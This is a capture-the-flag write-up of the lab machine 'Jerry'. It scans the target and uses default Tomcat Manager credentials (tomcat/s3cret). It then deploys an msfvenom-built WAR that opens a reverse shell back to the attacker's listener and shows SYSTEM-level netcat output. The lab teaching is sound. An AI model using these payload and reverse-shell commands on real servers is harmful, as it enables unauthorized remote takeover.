Procedure

Context

Jerry introduces fundamental concepts of web application exploitation and weak credential management. The machine features an exposed Apache Tomcat Manager interface, accessible without restrictions. By identifying and using default or leaked administrative credentials, we gain access to the Tomcat web application manager panel. From there, we exploit the deployment functionality to upload a malicious WAR (Web Application Archive) file—effectively deploying a custom web shell to the server. This direct deployment grants us remote code execution and ultimately a reverse shell on the target system.

Initial Enumeration

We start by performing a quick scan of the target machine using Nmap to identify open ports and services. The -sC flag enables default scripts, while the -sV flag attempts to determine the version of the services running on the open ports. The -p- flag scans all ports from 1 to 65535. The scan reveals that port 8080 is open and running an instance of Apache Tomcat with version 7.0.88. 

$ nmap -sC -sV -p- 10.10.10.95
          PORT     STATE SERVICE VERSION
          8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
          |_http-title: Apache Tomcat/7.0.88
          |_http-server-header: Apache-Coyote/1.1
          |_http-favicon: Apache Tomcat

HTTP

As soon as we access the web application, we are greeted with the default Apache Tomcat page. This page provides information about the server and its version. It also includes links to the Manager application, which is a web-based interface for managing the Tomcat server. If we try to access Server Status, Manager App, or Host Manager, we are prompted to enter credentials.

Since we haven't found any credentials yet, we cancel the request, which redirects us to a 401 Unauthorized page. Here, we find the credentials for the Manager application. The credentials are: username tomcat and password s3cret.

Exploitation

Now that we have the credentials, we can access the Manager application. The Manager application allows us to deploy, start, and stop directories, and applications on the server. If we look at the WAR file upload section, we can see that we can upload a WAR file. To do so, we can create a WAR file with a reverse shell and upload it to the server. In my case I used msfvenom to create a WAR file with a reverse shell as follows: 

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST={our_local_machine_ip} LPORT=PORT -f war > shell.war

When we upload the WAR file, we can see that it is deployed in the webapps directory.

We can access the WAR file by navigating to http://10.10.10.95/shell. First, we need to start a netcat listener on the same port we have set in the msfvenom command with the following command: 

$ nc -lvnp PORT

Remember -l is for listening, -v is for verbose, and -p is for port.

We can now access the WAR file and we should receive a reverse shell on our netcat listener. After getting it, we can see that we are running as user nt authority\system. 

$ nc -lvnp 1234
    listening on [any] 1234 ...
    connect to [10.10.16.8] from (UNKNOWN) [10.10.10.95] 49195
    Microsoft Windows [Version 6.3.9600]
    (c) 2013 Microsoft Corporation. All rights reserved.
            
C:\apache-tomcat-7.0.88> whoami
    whoami
    nt authority\system

While investigating the file system, we find in the directory C:\Users\Administrator\Desktop\flags a file named "2 for the price of 1.txt". This file contains the user flag and the root flag.

Glossary
  • Apache Tomcat: An open-source Java Servlet container developed by the Apache Software Foundation. It allows for the deployment and management of Java-based web applications. In this machine, it's used as the main attack surface due to its exposed Manager interface.
  • WAR (Web Application Archive): A file format used to package Java web applications. A WAR file can include JSPs, servlets, and other resources. In this context, a malicious WAR containing a reverse shell is deployed to the server.
  • msfvenom: A tool from the Metasploit framework used to generate payloads in various formats. Here, it's used to create a malicious WAR file with a reverse shell payload targeting the Tomcat server.
  • Reverse Shell: A type of shell where the target machine initiates a connection back to the attacker's system. This allows the attacker to remotely control the machine, bypassing NAT/firewall restrictions.
  • Nmap: A network scanning tool used to discover open ports and running services on a target machine. Flags like -sC, -sV, and -p- enable script scanning, service/version detection, and full port range scanning, respectively.
  • Netcat (nc): A versatile networking tool used for creating TCP/UDP connections. Here, it is used to listen for incoming reverse shell connections using the -lvnp flags (listen, verbose, specify port).
  • nt authority\system: The highest privilege level in Windows, equivalent to root in Unix-based systems. Gaining access as this user indicates full control over the target machine.
CONTACT